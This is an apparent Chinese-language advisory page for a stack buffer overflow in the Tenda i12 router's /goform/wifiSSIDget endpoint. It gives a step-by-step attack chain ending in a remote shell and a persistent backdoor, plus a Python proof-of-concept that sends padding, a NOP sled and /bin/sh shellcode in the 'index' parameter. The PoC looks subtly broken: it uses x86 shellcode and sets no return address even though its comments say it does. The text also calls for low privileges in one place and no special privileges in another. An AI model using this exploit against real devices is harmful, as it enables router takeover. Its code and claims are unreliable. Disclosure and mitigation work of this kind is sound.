CVE-2026-4043 Tenda i12 栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-4043

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda i12

漏洞概述

CVE-2026-4043是影响Tenda i12路由器1.0.0.6(2204)版本的严重安全漏洞。该漏洞存在于Web管理界面的WiFi配置功能中，具体位于/goform/wifiSSIDget接口的formwrlSSIDget函数。攻击者可以通过构造恶意的index参数值触发栈缓冲区溢出，成功利用此漏洞可在设备上执行任意代码。由于该漏洞的CVSS评分达到8.8分，属于高危级别，且攻击复杂度低、所需权限低、攻击向量为网络，远程攻击者无需特殊权限即可发起攻击。该漏洞已被公开披露，相关信息已在多个漏洞数据库和安全平台上发布，厂商Tenda已在其官网提供修复版本。鉴于该漏洞可能被恶意利用，建议受影响用户尽快升级到安全版本或采取临时缓解措施。

技术细节

该漏洞是典型的基于栈的缓冲区溢出（Stack-based Buffer Overflow）漏洞。在Tenda i12路由器的Web管理功能中，/goform/wifiSSIDget接口的formwrlSSIDget函数存在安全缺陷。函数在处理用户提交的index参数时，未对输入数据进行充分的边界检查直接将数据复制到栈上的固定大小缓冲区中。当index参数值超出预期范围时，溢出的数据会覆盖相邻的栈内存区域，包括函数返回地址和栈帧指针等关键数据结构。攻击者可以通过精心构造超长字符串作为index参数值，覆盖返回地址使其指向恶意代码，从而实现远程代码执行。由于该路由器通常部署在家庭和小型办公网络中，攻击者可通过互联网直接发起攻击，一旦成功控制路由器，可进一步进行网络嗅探、中间人攻击或将其作为僵尸网络节点。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标设备为Tenda i12路由器，并确认其固件版本为1.0.0.6(2204)

STEP 2

步骤2：漏洞探测

攻击者访问路由器的Web管理界面，发现/goform/wifiSSIDget接口存在且可访问

STEP 3

步骤3：构造攻击载荷

攻击者构造包含超长字符串的index参数，用于触发栈缓冲区溢出，覆盖返回地址

STEP 4

步骤4：发送恶意请求

通过HTTP GET请求将恶意payload发送给目标设备的/goform/wifiSSIDget接口

STEP 5

步骤5：代码执行

溢出成功后，恶意代码被执行为攻击者提供远程shell访问权限

STEP 6

步骤6：持久化控制

攻击者在受控路由器上部署后门程序，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4043 PoC - Tenda i12 Buffer Overflow
# Target: Tenda i12 1.0.0.6(2204)
# Vulnerability: Stack-based buffer overflow in /goform/wifiSSIDget

target_ip = "192.168.0.1"
target_port = 80
target_url = f"http://{target_ip}:{target_port}/goform/wifiSSIDget"

# Construct malicious payload with oversized index parameter
# This triggers stack buffer overflow by overwriting return address
def construct_payload():
    # Padding to fill the buffer
    padding = b"A" * 100
    # Overwrite return address with NOP sled + shellcode
    nop_sled = b"\x90" * 20
    # Simple shellcode for demonstration (executes /bin/sh)
    shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    return padding + nop_sled + shellcode

def exploit():
    payload = construct_payload()
    params = {"index": payload.decode('latin-1')}
    
    print(f"[*] Sending exploit to {target_url}")
    print(f"[*] Payload length: {len(payload)}")
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        print(f"[+] Response length: {len(response.content)}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Tenda i12 1.0.0.6(2204)

防御指南

临时缓解措施

如果无法立即升级固件，建议采取以下临时缓解措施：1) 通过访问控制列表（ACL）限制对路由器Web管理界面的访问，仅允许受信任的IP地址访问；2) 禁用路由器的WAN管理接口，防止来自互联网的直接攻击；3) 在网络边界部署防火墙或IPS设备，对发往路由器管理接口的异常请求进行检测和阻断；4) 监控路由器日志，关注异常的认证尝试和缓冲区溢出特征的行为；5) 考虑使用VPN连接进行远程管理，避免将管理接口直接暴露在公网上。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4043
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4043
3 Details https://www.cvedetails.com/cve/CVE-2026-4043/
4 VulDB https://vuldb.com/cve/CVE-2026-4043
5 Link https://github.com/Jimi-Lab/cve/issues/3
6 Link https://vuldb.com/?ctiid.350655
7 Link https://vuldb.com/?id.350655
8 Link https://vuldb.com/?submit.769464
9 Link https://www.tenda.com.cn/